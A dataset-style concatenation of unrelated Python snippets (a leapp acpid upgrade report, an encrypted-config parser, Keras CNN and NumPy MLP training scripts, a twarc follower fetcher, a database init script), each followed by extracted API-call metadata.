            reporting.Summary('The option -d (debug) no longer implies -f (foreground).'),
            reporting.Severity(reporting.Severity.LOW),
            reporting.Remediation(
                hint='You must now use both options (\'-df\') for the same behavior. Please update '
                     'your scripts to be compatible with the changes.'),
            reporting.Tags([reporting.Tags.KERNEL, reporting.Tags.SERVICES]),
            reporting.RelatedResource('package', 'acpid')
        ]
        create_report(report_fields)
| [
"leapp.reporting.RelatedResource",
"leapp.reporting.Remediation",
"leapp.reporting.Title",
"leapp.libraries.common.rpms.has_package",
"leapp.reporting.Tags",
"leapp.reporting.Summary",
"leapp.reporting.Severity"
] | [((569, 615), 'leapp.libraries.common.rpms.has_package', 'has_package', (['InstalledRedHatSignedRPM', '"""acpid"""'], {}), "(InstalledRedHatSignedRPM, 'acpid')\n", (580, 615), False, 'from leapp.libraries.common.rpms import has_package\n'), ((661, 732), 'leapp.reporting.Title', 'reporting.Title', (['"""Acpid incompatible changes in the next major version"""'], {}), "('Acpid incompatible changes in the next major version')\n", (676, 732), False, 'from leapp import reporting\n'), ((750, 827), 'leapp.reporting.Summary', 'reporting.Summary', (['"""The option -d (debug) no longer implies -f (foreground)."""'], {}), "('The option -d (debug) no longer implies -f (foreground).')\n", (767, 827), False, 'from leapp import reporting\n'), ((845, 887), 'leapp.reporting.Severity', 'reporting.Severity', (['reporting.Severity.LOW'], {}), '(reporting.Severity.LOW)\n', (863, 887), False, 'from leapp import reporting\n'), ((905, 1067), 'leapp.reporting.Remediation', 'reporting.Remediation', ([], {'hint': '"""You must now use both options (\'-df\') for the same behavior. Please update your scripts to be compatible with the changes."""'}), '(hint=\n "You must now use both options (\'-df\') for the same behavior. Please update your scripts to be compatible with the changes."\n )\n', (926, 1067), False, 'from leapp import reporting\n'), ((1126, 1190), 'leapp.reporting.Tags', 'reporting.Tags', (['[reporting.Tags.KERNEL, reporting.Tags.SERVICES]'], {}), '([reporting.Tags.KERNEL, reporting.Tags.SERVICES])\n', (1140, 1190), False, 'from leapp import reporting\n'), ((1208, 1253), 'leapp.reporting.RelatedResource', 'reporting.RelatedResource', (['"""package"""', '"""acpid"""'], {}), "('package', 'acpid')\n", (1233, 1253), False, 'from leapp import reporting\n')] |
from crypto_config import (ConfigParser, ParsingError, Crypt)
import re
class CryptoConfigParser(ConfigParser):
    """ConfigParser that transparently decrypts values wrapped in ``enc(...)``.

    Pass ``crypt_key=<key>`` to the constructor to enable decryption; without
    a key, encrypted values are returned verbatim.
    """

    # Matches values of the form "enc(<ciphertext>)"; compiled once instead
    # of on every get() call.
    _ENC_PATTERN = re.compile(r"enc\((.*)\)", re.IGNORECASE)

    def __init__(self, *args, **kwargs):
        # Pop our extra keyword before delegating so ConfigParser does not
        # see an argument it does not understand.  (The old code compared
        # with ``!= None`` and had a redundant if/else for this.)
        self.crypt_key = kwargs.pop('crypt_key', None)
        ConfigParser.__init__(self, *args, **kwargs)

    def get(self, section, option, *args, **kwargs):
        """Return the option value, decrypting it when it is enc(...)-wrapped
        and a crypt key is available."""
        raw_val = ConfigParser.get(self, section, option, *args, **kwargs)
        encoded_val = self._ENC_PATTERN.search(raw_val)
        if encoded_val and self.crypt_key:
            return self._decrypt(encoded_val.group(1), self.crypt_key)
        return raw_val

    def _decrypt(self, ciphertext, key):
        # Delegate the actual cryptography to crypto_config.Crypt.
        # (Parameter renamed from ``str`` to avoid shadowing the builtin.)
        c = Crypt(key)
        b_decoded = c.decrypt(ciphertext)
return b_decoded | [
"crypto_config.ConfigParser.__init__",
"crypto_config.Crypt",
"crypto_config.ConfigParser.get",
"re.search"
] | [((314, 358), 'crypto_config.ConfigParser.__init__', 'ConfigParser.__init__', (['self', '*args'], {}), '(self, *args, **kwargs)\n', (335, 358), False, 'from crypto_config import ConfigParser, ParsingError, Crypt\n'), ((431, 487), 'crypto_config.ConfigParser.get', 'ConfigParser.get', (['self', 'section', 'option', '*args'], {}), '(self, section, option, *args, **kwargs)\n', (447, 487), False, 'from crypto_config import ConfigParser, ParsingError, Crypt\n'), ((532, 582), 're.search', 're.search', (['"""enc\\\\((.*)\\\\)"""', 'raw_val', 're.IGNORECASE'], {}), "('enc\\\\((.*)\\\\)', raw_val, re.IGNORECASE)\n", (541, 582), False, 'import re\n'), ((761, 771), 'crypto_config.Crypt', 'Crypt', (['key'], {}), '(key)\n', (766, 771), False, 'from crypto_config import ConfigParser, ParsingError, Crypt\n')] |
import os.path
import scipy.io as sio
import numpy as np # for algebraic operations, matrices
import keras.models
from keras.models import Sequential
from keras.layers.core import Dense, Activation, Flatten, Dropout # , Layer, Flatten
# from keras.layers import containers
from keras.models import model_from_json,Model
from sklearn.model_selection import GridSearchCV
from keras.wrappers.scikit_learn import KerasClassifier
from hyperas.distributions import choice, uniform, conditional
from hyperopt import Trials, STATUS_OK
from sklearn.metrics import confusion_matrix
from keras.layers.normalization import BatchNormalization
from keras.layers.convolutional import Conv2D
from keras.layers.convolutional import MaxPooling2D as pool2
from keras.callbacks import EarlyStopping,ModelCheckpoint
# from keras.layers.convolutional import ZeroPadding2D as zero2d
from keras.regularizers import l2 # , activity_l2
# from theano import functionfrom keras.applications.vgg16 import VGG16
from keras.applications.vgg16 import VGG16
from keras.preprocessing import image
from keras.applications.vgg16 import preprocess_input
from keras.optimizers import SGD
from keras.layers.merge import concatenate
from keras.layers import Input,add
from keras.layers.advanced_activations import PReLU,ELU
from keras.layers.pooling import GlobalAveragePooling2D
# Inception/ResNet-style CNN for 180x180 input patches.
def create180180Model(patchSize):
    """Build the Inception/ResNet-style CNN for 180x180 input patches.

    Args:
        patchSize: 2-D array-like; patchSize[0, 0] and patchSize[0, 1] give
            the patch height and width (expected to be 180 x 180).

    Returns:
        An uncompiled keras Model mapping a (1, H, W) channels-first input
        to an 11-class softmax output.
    """
    # Fixed seed so the random weight initialisation is reproducible.
    seed=5
    np.random.seed(seed)
    # Single-channel, channels-first input tensor.
    input=Input(shape=(1,patchSize[0, 0], patchSize[0, 1]))
    # Stem: two 3x3 'valid' convolutions followed by 2x2 max pooling.
    out1=Conv2D(filters=64,kernel_size=(3,3),kernel_initializer='he_normal',weights=None,padding='valid',strides=(1, 1),kernel_regularizer=l2(1e-6),activation='relu')(input)
    out2=Conv2D(filters=64,kernel_size=(3,3),kernel_initializer='he_normal',weights=None,padding='valid',strides=(1, 1),kernel_regularizer=l2(1e-6),activation='relu')(out1)
    out2=pool2(pool_size=(2,2),data_format='channels_first')(out2)
    # Residual block: two 3x3 'same' convolutions with an identity shortcut
    # from out2, then pooling.
    out3=Conv2D(filters=64,kernel_size=(3,3),kernel_initializer='he_normal',weights=None,padding='same',strides=(1, 1),kernel_regularizer=l2(1e-6),activation='relu')(out2)
    out4=Conv2D(filters=64,kernel_size=(3,3),kernel_initializer='he_normal',weights=None,padding='same',strides=(1, 1),kernel_regularizer=l2(1e-6),activation='relu')(out3)
    out4=add([out2,out4])
    out4=pool2(pool_size=(2,2),data_format='channels_first')(out4)
    # Two 3x3 convolutions widening to 128 channels.
    out_3=Conv2D(filters=128,kernel_size=(3,3),kernel_initializer='he_normal',weights=None,padding='same',strides=(1, 1),kernel_regularizer=l2(1e-6),activation='relu')(out4)
    out_4=Conv2D(filters=128,kernel_size=(3,3),kernel_initializer='he_normal',weights=None,padding='same',strides=(1, 1),kernel_regularizer=l2(1e-6),activation='relu')(out_3)
    # Inception block: parallel 1x1, 1x1->3x3 and 1x1->5x5 branches.
    out5_1=Conv2D(filters=32,kernel_size=(1,1),kernel_initializer='he_normal',weights=None,padding='same',strides=(1, 1),kernel_regularizer=l2(1e-6),activation='relu')(out_4)
    out5_2=Conv2D(filters=32,kernel_size=(1,1),kernel_initializer='he_normal',weights=None,padding='same',strides=(1, 1),kernel_regularizer=l2(1e-6),activation='relu')(out_4)
    out5_2=Conv2D(filters=128,kernel_size=(3,3),kernel_initializer='he_normal',weights=None,padding='same',strides=(1, 1),kernel_regularizer=l2(1e-6),activation='relu')(out5_2)
    out5_3=Conv2D(filters=32,kernel_size=(1,1),kernel_initializer='he_normal',weights=None,padding='same',strides=(1, 1),kernel_regularizer=l2(1e-6),activation='relu')(out_4)
    out5_3=Conv2D(filters=128,kernel_size=(5,5),kernel_initializer='he_normal',weights=None,padding='same',strides=(1, 1),kernel_regularizer=l2(1e-6),activation='relu')(out5_3)
    # NOTE(review): out5_4 (the pooling branch) is computed but not included
    # in the concatenation below -- confirm whether that is intentional.
    out5_4=pool2(pool_size=(3,3),strides=(1,1),padding='same',data_format='channels_first')(out_4)
    out5_4=Conv2D(filters=128,kernel_size=(1,1),kernel_initializer='he_normal',weights=None,padding='same',strides=(1, 1),kernel_regularizer=l2(1e-6),activation='relu')(out5_4)
    # Channel-wise concatenation: 32 + 128 + 128 = 288 channels.
    out5=concatenate(inputs=[out5_1,out5_2,out5_3],axis=1)
    # 3x3 convolution on the 288-channel tensor with a residual shortcut,
    # then pooling.
    out7=Conv2D(filters=288,kernel_size=(3,3),kernel_initializer='he_normal',weights=None,padding='same',strides=(1, 1),kernel_regularizer=l2(1e-6),
                      activation='relu')(out5)
    out7=add([out5, out7])
    out7=pool2(pool_size=(2,2),data_format='channels_first')(out7)
    # Second residual block at 256 channels (sout7 is the shortcut branch).
    sout7=Conv2D(filters=256,kernel_size=(3,3),kernel_initializer='he_normal',weights=None,padding='same',strides=(1, 1),kernel_regularizer=l2(1e-6),
                      activation='relu')(out7)
    out8=Conv2D(filters=256,kernel_size=(3,3),kernel_initializer='he_normal',weights=None,padding='same',strides=(1, 1),kernel_regularizer=l2(1e-6),
                      activation='relu')(out7)
    out9=Conv2D(filters=256,kernel_size=(3,3),kernel_initializer='he_normal',weights=None,padding='same',strides=(1, 1),kernel_regularizer=l2(1e-6),
                      activation='relu')(out8)
    out9=add([sout7, out9])
    out9=pool2(pool_size=(2,2),data_format='channels_first')(out9)
    # Classifier head: flatten and project to 11 softmax classes.
    out10=Flatten()(out9)
    out11=Dense(units=11,
                kernel_initializer='normal',
                kernel_regularizer='l2',
                activation='softmax')(out10)
    cnn = Model(inputs=input,outputs=out11)
    return cnn
def fTrain(X_train, y_train, X_test, y_test, sOutPath, patchSize, batchSizes=None, learningRates=None, iEpochs=None):
    """Grid search over every (batch size, learning rate) combination.

    batchSizes and learningRates are iterables of candidate values; each
    pair is handed to fTrainInner, which performs one full training run
    and stores its results on disk.

    Bug fix: the defaults used to be the bare scalars 64 / 0.01, which are
    not iterable and made the loops below raise TypeError; they are now
    one-element lists with the same intended values.
    """
    # parse inputs, falling back to default hyper-parameters
    batchSizes = [64] if batchSizes is None else batchSizes
    learningRates = [0.01] if learningRates is None else learningRates
    iEpochs = 300 if iEpochs is None else iEpochs
    for iBatch in batchSizes:
        for iLearn in learningRates:
            fTrainInner(X_train, y_train, X_test, y_test, sOutPath, patchSize, iBatch, iLearn, iEpochs)
def fTrainInner(X_train, y_train, X_test, y_test, sOutPath, patchSize, batchSize=None, learningRate=None, iEpochs=None):
    """Run one full training of the 180x180 CNN and persist the results.

    Trains with Adam, early stopping and best-weight checkpointing, then
    saves the model JSON/weights and a .mat summary (training curves, test
    score, prediction probabilities and confusion matrix) derived from
    sOutPath.  Returns early when the output .mat already exists or when
    the patch size is not 180x180 (no model is defined for other sizes).
    """
    # parse inputs
    batchSize = 64 if batchSize is None else batchSize
    learningRate = 0.01 if learningRate is None else learningRate
    iEpochs = 300 if iEpochs is None else iEpochs

    print('Training CNN InceptionNet')
    print('with lr = ' + str(learningRate) + ' , batchSize = ' + str(batchSize))

    # Derive all output file names from the patch size and hyper-parameters.
    _, sPath = os.path.splitdrive(sOutPath)
    sPath, sFilename = os.path.split(sPath)
    sFilename, sExt = os.path.splitext(sFilename)
    model_name = sPath + '/' + sFilename + str(patchSize[0, 0]) + str(patchSize[0, 1]) + '_lr_' + str(
        learningRate) + '_bs_' + str(batchSize)
    weight_name = model_name + '_weights.h5'
    model_json = model_name + '_json'
    model_all = model_name + '_model.h5'
    model_mat = model_name + '.mat'

    if os.path.isfile(model_mat):  # no training if output file exists
        return

    # Bug fix: the original condition was written with the bitwise '&'
    # operator, which binds tighter than '!=' and turned the test into a
    # chained comparison; on a mismatch it also fell through with 'cnn'
    # undefined, and the print concatenated ints to a str (TypeError).
    if patchSize[0, 0] != 180 or patchSize[0, 1] != 180:
        print('NO model for patch size ' + str(patchSize[0, 0]) + str(patchSize[0, 1]))
        return
    cnn = create180180Model(patchSize)

    # opti = SGD(lr=learningRate, momentum=1e-8, decay=0.1, nesterov=True);#Adag(lr=0.01, epsilon=1e-06)
    opti = keras.optimizers.Adam(lr=learningRate, beta_1=0.9, beta_2=0.999, epsilon=1e-08, decay=0.0)
    # Stop when validation loss stalls; always keep the best-val_acc weights.
    callbacks = [EarlyStopping(monitor='val_loss', patience=20, verbose=1), ModelCheckpoint(filepath=model_name+'bestweights.hdf5',monitor='val_acc',verbose=0,save_best_only=True,save_weights_only=False)]

    cnn.compile(loss='categorical_crossentropy', optimizer=opti, metrics=['accuracy'])
    cnn.summary()
    result = cnn.fit(X_train,
                     y_train,
                     validation_data=[X_test, y_test],
                     epochs=iEpochs,
                     batch_size=batchSize,
                     callbacks=callbacks,
                     verbose=1)

    score_test, acc_test = cnn.evaluate(X_test, y_test, batch_size=batchSize)
    prob_test = cnn.predict(X_test, batchSize, 0)
    y_pred = np.argmax(prob_test, axis=1)
    y_true = np.argmax(y_test, axis=1)
    confusion_mat = confusion_matrix(y_true, y_pred)

    # save model architecture and weights (with-block closes the file,
    # unlike the previous open(...).write(...) one-liner)
    json_string = cnn.to_json()
    with open(model_json, 'w') as json_file:
        json_file.write(json_string)
    cnn.save_weights(weight_name, overwrite=True)

    # export training history and evaluation results for matlab
    acc = result.history['acc']
    loss = result.history['loss']
    val_acc = result.history['val_acc']
    val_loss = result.history['val_loss']
    print('Saving results: ' + model_name)
    sio.savemat(model_name, {'model_settings': model_json,
                             'model': model_all,
                             'weights': weight_name,
                             'acc': acc,
                             'loss': loss,
                             'val_acc': val_acc,
                             'val_loss': val_loss,
                             'score_test': score_test,
                             'acc_test': acc_test,
                             'prob_test': prob_test,
                             'confusion_mat': confusion_mat})
def fPredict(X_test, y_test, model_name, sOutPath, patchSize, batchSize):
    """Evaluate a stored model on the test set and save a .mat summary.

    model_name[0] must be the path of a model saved with keras (.h5/.hdf5);
    the prediction probabilities, test score/accuracy and confusion matrix
    are written to '<sOutPath>/<basename>_result.mat'.
    """
    weight_name = model_name[0]
    # Only the final path component is needed to build the output file name.
    sPath, sFilename = os.path.split(sOutPath)

    # Bug fix: the original called the bare name 'load_model', which is
    # never imported in this module; use the qualified keras API.  It
    # restores architecture, weights and the compiled state in one step,
    # so the unused optimizer/callbacks locals were dropped as well.
    model = keras.models.load_model(weight_name)
    model.summary()

    score_test, acc_test = model.evaluate(X_test, y_test, batch_size=batchSize)
    prob_pre = model.predict(X_test, batchSize, 0)
    y_pred = np.argmax(prob_pre, axis=1)
    y_true = np.argmax(y_test, axis=1)
    confusion_mat = confusion_matrix(y_true, y_pred)

    modelSave = sOutPath + '/' + sFilename + '_result.mat'
    sio.savemat(modelSave, {'prob_pre': prob_pre, 'score_test': score_test, 'acc_test': acc_test, 'confusion_mat': confusion_mat})
| [
"keras.layers.core.Flatten",
"scipy.io.savemat",
"keras.callbacks.ModelCheckpoint",
"keras.layers.merge.concatenate",
"keras.layers.add",
"numpy.argmax",
"keras.layers.Input",
"keras.layers.core.Dense",
"keras.regularizers.l2",
"keras.models.Model",
"numpy.random.seed",
"keras.layers.convoluti... | [((1422, 1442), 'numpy.random.seed', 'np.random.seed', (['seed'], {}), '(seed)\n', (1436, 1442), True, 'import numpy as np\n'), ((1450, 1500), 'keras.layers.Input', 'Input', ([], {'shape': '(1, patchSize[0, 0], patchSize[0, 1])'}), '(shape=(1, patchSize[0, 0], patchSize[0, 1]))\n', (1455, 1500), False, 'from keras.layers import Input, add\n'), ((2250, 2267), 'keras.layers.add', 'add', (['[out2, out4]'], {}), '([out2, out4])\n', (2253, 2267), False, 'from keras.layers import Input, add\n'), ((3820, 3872), 'keras.layers.merge.concatenate', 'concatenate', ([], {'inputs': '[out5_1, out5_2, out5_3]', 'axis': '(1)'}), '(inputs=[out5_1, out5_2, out5_3], axis=1)\n', (3831, 3872), False, 'from keras.layers.merge import concatenate\n'), ((4061, 4078), 'keras.layers.add', 'add', (['[out5, out7]'], {}), '([out5, out7])\n', (4064, 4078), False, 'from keras.layers import Input, add\n'), ((4703, 4721), 'keras.layers.add', 'add', (['[sout7, out9]'], {}), '([sout7, out9])\n', (4706, 4721), False, 'from keras.layers import Input, add\n'), ((4966, 5000), 'keras.models.Model', 'Model', ([], {'inputs': 'input', 'outputs': 'out11'}), '(inputs=input, outputs=out11)\n', (4971, 5000), False, 'from keras.models import model_from_json, Model\n'), ((7656, 7684), 'numpy.argmax', 'np.argmax', (['prob_test'], {'axis': '(1)'}), '(prob_test, axis=1)\n', (7665, 7684), True, 'import numpy as np\n'), ((7692, 7717), 'numpy.argmax', 'np.argmax', (['y_test'], {'axis': '(1)'}), '(y_test, axis=1)\n', (7701, 7717), True, 'import numpy as np\n'), ((7732, 7764), 'sklearn.metrics.confusion_matrix', 'confusion_matrix', (['y_test', 'y_pred'], {}), '(y_test, y_pred)\n', (7748, 7764), False, 'from sklearn.metrics import confusion_matrix\n'), ((8151, 8434), 'scipy.io.savemat', 'sio.savemat', (['model_name', "{'model_settings': model_json, 'model': model_all, 'weights': weight_name,\n 'acc': acc, 'loss': loss, 'val_acc': val_acc, 'val_loss': val_loss,\n 'score_test': score_test, 
'acc_test': acc_test, 'prob_test': prob_test,\n 'confusion_mat': confusion_mat}"], {}), "(model_name, {'model_settings': model_json, 'model': model_all,\n 'weights': weight_name, 'acc': acc, 'loss': loss, 'val_acc': val_acc,\n 'val_loss': val_loss, 'score_test': score_test, 'acc_test': acc_test,\n 'prob_test': prob_test, 'confusion_mat': confusion_mat})\n", (8162, 8434), True, 'import scipy.io as sio\n'), ((9546, 9573), 'numpy.argmax', 'np.argmax', (['prob_pre'], {'axis': '(1)'}), '(prob_pre, axis=1)\n', (9555, 9573), True, 'import numpy as np\n'), ((9581, 9606), 'numpy.argmax', 'np.argmax', (['y_test'], {'axis': '(1)'}), '(y_test, axis=1)\n', (9590, 9606), True, 'import numpy as np\n'), ((9621, 9653), 'sklearn.metrics.confusion_matrix', 'confusion_matrix', (['y_test', 'y_pred'], {}), '(y_test, y_pred)\n', (9637, 9653), False, 'from sklearn.metrics import confusion_matrix\n'), ((9755, 9885), 'scipy.io.savemat', 'sio.savemat', (['modelSave', "{'prob_pre': prob_pre, 'score_test': score_test, 'acc_test': acc_test,\n 'confusion_mat': confusion_mat}"], {}), "(modelSave, {'prob_pre': prob_pre, 'score_test': score_test,\n 'acc_test': acc_test, 'confusion_mat': confusion_mat})\n", (9766, 9885), True, 'import scipy.io as sio\n'), ((1847, 1900), 'keras.layers.convolutional.MaxPooling2D', 'pool2', ([], {'pool_size': '(2, 2)', 'data_format': '"""channels_first"""'}), "(pool_size=(2, 2), data_format='channels_first')\n", (1852, 1900), True, 'from keras.layers.convolutional import MaxPooling2D as pool2\n'), ((2273, 2326), 'keras.layers.convolutional.MaxPooling2D', 'pool2', ([], {'pool_size': '(2, 2)', 'data_format': '"""channels_first"""'}), "(pool_size=(2, 2), data_format='channels_first')\n", (2278, 2326), True, 'from keras.layers.convolutional import MaxPooling2D as pool2\n'), ((3551, 3641), 'keras.layers.convolutional.MaxPooling2D', 'pool2', ([], {'pool_size': '(3, 3)', 'strides': '(1, 1)', 'padding': '"""same"""', 'data_format': '"""channels_first"""'}), "(pool_size=(3, 3), 
strides=(1, 1), padding='same', data_format=\n 'channels_first')\n", (3556, 3641), True, 'from keras.layers.convolutional import MaxPooling2D as pool2\n'), ((4085, 4138), 'keras.layers.convolutional.MaxPooling2D', 'pool2', ([], {'pool_size': '(2, 2)', 'data_format': '"""channels_first"""'}), "(pool_size=(2, 2), data_format='channels_first')\n", (4090, 4138), True, 'from keras.layers.convolutional import MaxPooling2D as pool2\n'), ((4729, 4782), 'keras.layers.convolutional.MaxPooling2D', 'pool2', ([], {'pool_size': '(2, 2)', 'data_format': '"""channels_first"""'}), "(pool_size=(2, 2), data_format='channels_first')\n", (4734, 4782), True, 'from keras.layers.convolutional import MaxPooling2D as pool2\n'), ((4795, 4804), 'keras.layers.core.Flatten', 'Flatten', ([], {}), '()\n', (4802, 4804), False, 'from keras.layers.core import Dense, Activation, Flatten, Dropout\n'), ((4820, 4915), 'keras.layers.core.Dense', 'Dense', ([], {'units': '(11)', 'kernel_initializer': '"""normal"""', 'kernel_regularizer': '"""l2"""', 'activation': '"""softmax"""'}), "(units=11, kernel_initializer='normal', kernel_regularizer='l2',\n activation='softmax')\n", (4825, 4915), False, 'from keras.layers.core import Dense, Activation, Flatten, Dropout\n'), ((6843, 6900), 'keras.callbacks.EarlyStopping', 'EarlyStopping', ([], {'monitor': '"""val_loss"""', 'patience': '(20)', 'verbose': '(1)'}), "(monitor='val_loss', patience=20, verbose=1)\n", (6856, 6900), False, 'from keras.callbacks import EarlyStopping, ModelCheckpoint\n'), ((6902, 7039), 'keras.callbacks.ModelCheckpoint', 'ModelCheckpoint', ([], {'filepath': "(model_name + 'bestweights.hdf5')", 'monitor': '"""val_acc"""', 'verbose': '(0)', 'save_best_only': '(True)', 'save_weights_only': '(False)'}), "(filepath=model_name + 'bestweights.hdf5', monitor='val_acc',\n verbose=0, save_best_only=True, save_weights_only=False)\n", (6917, 7039), False, 'from keras.callbacks import EarlyStopping, ModelCheckpoint\n'), ((9212, 9269), 
'keras.callbacks.EarlyStopping', 'EarlyStopping', ([], {'monitor': '"""val_loss"""', 'patience': '(10)', 'verbose': '(1)'}), "(monitor='val_loss', patience=10, verbose=1)\n", (9225, 9269), False, 'from keras.callbacks import EarlyStopping, ModelCheckpoint\n'), ((1636, 1645), 'keras.regularizers.l2', 'l2', (['(1e-06)'], {}), '(1e-06)\n', (1638, 1645), False, 'from keras.regularizers import l2\n'), ((1807, 1816), 'keras.regularizers.l2', 'l2', (['(1e-06)'], {}), '(1e-06)\n', (1809, 1816), False, 'from keras.regularizers import l2\n'), ((2041, 2050), 'keras.regularizers.l2', 'l2', (['(1e-06)'], {}), '(1e-06)\n', (2043, 2050), False, 'from keras.regularizers import l2\n'), ((2210, 2219), 'keras.regularizers.l2', 'l2', (['(1e-06)'], {}), '(1e-06)\n', (2212, 2219), False, 'from keras.regularizers import l2\n'), ((2469, 2478), 'keras.regularizers.l2', 'l2', (['(1e-06)'], {}), '(1e-06)\n', (2471, 2478), False, 'from keras.regularizers import l2\n'), ((2640, 2649), 'keras.regularizers.l2', 'l2', (['(1e-06)'], {}), '(1e-06)\n', (2642, 2649), False, 'from keras.regularizers import l2\n'), ((2813, 2822), 'keras.regularizers.l2', 'l2', (['(1e-06)'], {}), '(1e-06)\n', (2815, 2822), False, 'from keras.regularizers import l2\n'), ((2986, 2995), 'keras.regularizers.l2', 'l2', (['(1e-06)'], {}), '(1e-06)\n', (2988, 2995), False, 'from keras.regularizers import l2\n'), ((3159, 3168), 'keras.regularizers.l2', 'l2', (['(1e-06)'], {}), '(1e-06)\n', (3161, 3168), False, 'from keras.regularizers import l2\n'), ((3333, 3342), 'keras.regularizers.l2', 'l2', (['(1e-06)'], {}), '(1e-06)\n', (3335, 3342), False, 'from keras.regularizers import l2\n'), ((3506, 3515), 'keras.regularizers.l2', 'l2', (['(1e-06)'], {}), '(1e-06)\n', (3508, 3515), False, 'from keras.regularizers import l2\n'), ((3777, 3786), 'keras.regularizers.l2', 'l2', (['(1e-06)'], {}), '(1e-06)\n', (3779, 3786), False, 'from keras.regularizers import l2\n'), ((4007, 4016), 'keras.regularizers.l2', 'l2', (['(1e-06)'], {}), 
'(1e-06)\n', (4009, 4016), False, 'from keras.regularizers import l2\n'), ((4280, 4289), 'keras.regularizers.l2', 'l2', (['(1e-06)'], {}), '(1e-06)\n', (4282, 4289), False, 'from keras.regularizers import l2\n'), ((4465, 4474), 'keras.regularizers.l2', 'l2', (['(1e-06)'], {}), '(1e-06)\n', (4467, 4474), False, 'from keras.regularizers import l2\n'), ((4649, 4658), 'keras.regularizers.l2', 'l2', (['(1e-06)'], {}), '(1e-06)\n', (4651, 4658), False, 'from keras.regularizers import l2\n')] |
from twarc import Twarc2, expansions
import json
# Replace your bearer token below
client = Twarc2(bearer_token="<PASSWORD>")


def main():
    """Stream the followers of @twitterdev and print each as JSON."""
    # client.followers() pages through the followers of the given user.
    for page in client.followers(user="twitterdev"):
        # Flatten the response so every user object carries its expansions.
        for user in expansions.flatten(page):
            print(json.dumps(user))


if __name__ == "__main__":
    main()
| [
"twarc.expansions.flatten",
"json.dumps",
"twarc.Twarc2"
] | [((93, 126), 'twarc.Twarc2', 'Twarc2', ([], {'bearer_token': '"""<PASSWORD>"""'}), "(bearer_token='<PASSWORD>')\n", (99, 126), False, 'from twarc import Twarc2, expansions\n'), ((300, 324), 'twarc.expansions.flatten', 'expansions.flatten', (['page'], {}), '(page)\n', (318, 324), False, 'from twarc import Twarc2, expansions\n'), ((448, 464), 'json.dumps', 'json.dumps', (['user'], {}), '(user)\n', (458, 464), False, 'import json\n')] |
#!/usr/bin/env python3
# encoding: utf-8
"""Create the database via db_tools.init_db, then import the world data
from ../atlemuria.txt and ../proplemuria.txt."""
import asyncio
from db_tools import init_db
from db_tools import import_world
# Initialise the schema first, then load the world data; each coroutine
# runs in its own event loop via asyncio.run().
asyncio.run(init_db())
asyncio.run(import_world('../atlemuria.txt', '../proplemuria.txt'))
| [
"db_tools.init_db",
"db_tools.import_world"
] | [((190, 199), 'db_tools.init_db', 'init_db', ([], {}), '()\n', (197, 199), False, 'from db_tools import init_db\n'), ((213, 267), 'db_tools.import_world', 'import_world', (['"""../atlemuria.txt"""', '"""../proplemuria.txt"""'], {}), "('../atlemuria.txt', '../proplemuria.txt')\n", (225, 267), False, 'from db_tools import import_world\n')] |
import numpy as np
import random
import matplotlib.pyplot as plt
from load_data import loadLabel,loadImage
def der_activation_function(x, type):
    """Derivative of the activation selected by *type*.

    type 1: tanh     -> 1 - tanh(x)**2
    type 2: sigmoid  -> s(x) * (1 - s(x))
    otherwise: leaky ReLU with slope 0.25 -> 0.25 where x <= 0, else 1

    The input array is never modified.
    """
    if type == 1:
        return 1 - np.power(np.tanh(x), 2)
    elif type == 2:
        s = 1 / (1 + np.exp(-x))
        return s * (1 - s)
    else:
        # Bug fix: the old code first set x[x<=0]=0.25 and then x[x>0]=1,
        # so the freshly written 0.25 entries (being positive) were
        # immediately overwritten with 1, yielding an all-ones derivative
        # -- and it mutated the caller's array in place.
        return np.where(x <= 0, 0.25, 1.0)
def activation_function(x, type):
    """Apply the activation selected by *type*: 1 -> tanh, 2 -> sigmoid,
    anything else -> leaky ReLU with slope 0.25 on the negative side."""
    if type == 1:
        return np.tanh(x)
    if type == 2:
        return 1 / (1 + np.exp(-x))
    return np.where(x <= 0, 0.25 * x, x)
def MLP_train(data, labels, hidden_nodes, epoch, test_data, test_labels):
    """Train a one-hidden-layer MLP with per-sample SGD and print test accuracy.

    data/labels: training samples (one row per sample) and one-hot labels.
    hidden_nodes: width of the single hidden layer.
    epoch: number of passes over the training set.
    test_data/test_labels: held-out set evaluated once after training.

    Both layers use activation type 3 (leaky ReLU, slope 0.25); the output
    layer is hard-coded to 10 classes.
    """
    # Fixed learning rate for the online gradient updates.
    alpha=0.002
    size=data.shape
    # Hidden-layer weights, uniformly initialised in [-0.4, 0.4].
    w1=np.zeros((hidden_nodes,size[1]))
    for i in range(hidden_nodes):
        for j in range(size[1]):
            w1[i,j]=random.uniform(-0.4,0.4)
    # Output-layer weights (10 classes), same initialisation.
    w2=np.zeros((10,hidden_nodes))
    for i in range(10):
        for j in range(hidden_nodes):
            w2[i,j]=random.uniform(-0.4,0.4)
    # Biases start at zero.
    b1=np.zeros(hidden_nodes)
    b2=np.zeros(10)
    for i in range(epoch):
        for x,y in zip(data,labels):
            # Forward pass: pre-activations u, v and activations h, output.
            u=np.dot(w1,x.T)+b1
            h=activation_function(u,3)
            v=np.dot(w2,h)+b2
            output=activation_function(v,3)
            # Backward pass: output-layer delta, then the hidden-layer delta
            # back-propagated through w2.
            delta2=(output-y.T)*der_activation_function(v,3)
            delta1=der_activation_function(u,3)*np.dot(w2.T,delta2)
            # Outer products give this sample's weight gradients.
            d_w1=np.dot(np.expand_dims(delta1,axis=1),np.expand_dims(x,axis=0))
            d_w2=np.dot(np.expand_dims(delta2,axis=1),np.expand_dims(h,axis=0))
            # Plain gradient-descent update.
            w1=w1-alpha*d_w1
            w2=w2-alpha*d_w2
            b1=b1-alpha*delta1
            b2=b2-alpha*delta2
    # Evaluate on the whole test set in one batched forward pass.
    u_test=np.dot(w1,test_data.T)+np.expand_dims(b1,axis=1)
    h_test=activation_function(u_test,3)
    v_test=np.dot(w2,h_test)+np.expand_dims(b2,axis=1)
    output_test=activation_function(v_test.T,3)
    # Accuracy = fraction of samples whose argmax matches the label argmax.
    right_times=0
    for i in range(len(output_test)):
        if np.argmax(output_test[i])==np.argmax(test_labels[i]):
            right_times+=1
    accuracy=right_times/len(output_test)
    print(accuracy)
if __name__=='__main__':
    # Load the MNIST idx-format training and test sets.
    train_imgs=loadImage("train-images-idx3-ubyte")
    train_labels=loadLabel("train-labels-idx1-ubyte")
    test_imgs=loadImage("t10k-images-idx3-ubyte")
    # Fixed seed so the uniform weight initialisation is reproducible.
    random.seed(2)
    test_labels=loadLabel("t10k-labels-idx1-ubyte")
    # MLP_train(train_imgs,train_labels,25,15,test_imgs,test_labels)
    # Sweep the hidden-layer width: 30, 40 and 50 nodes.
    for nodes in range(30,60,10):
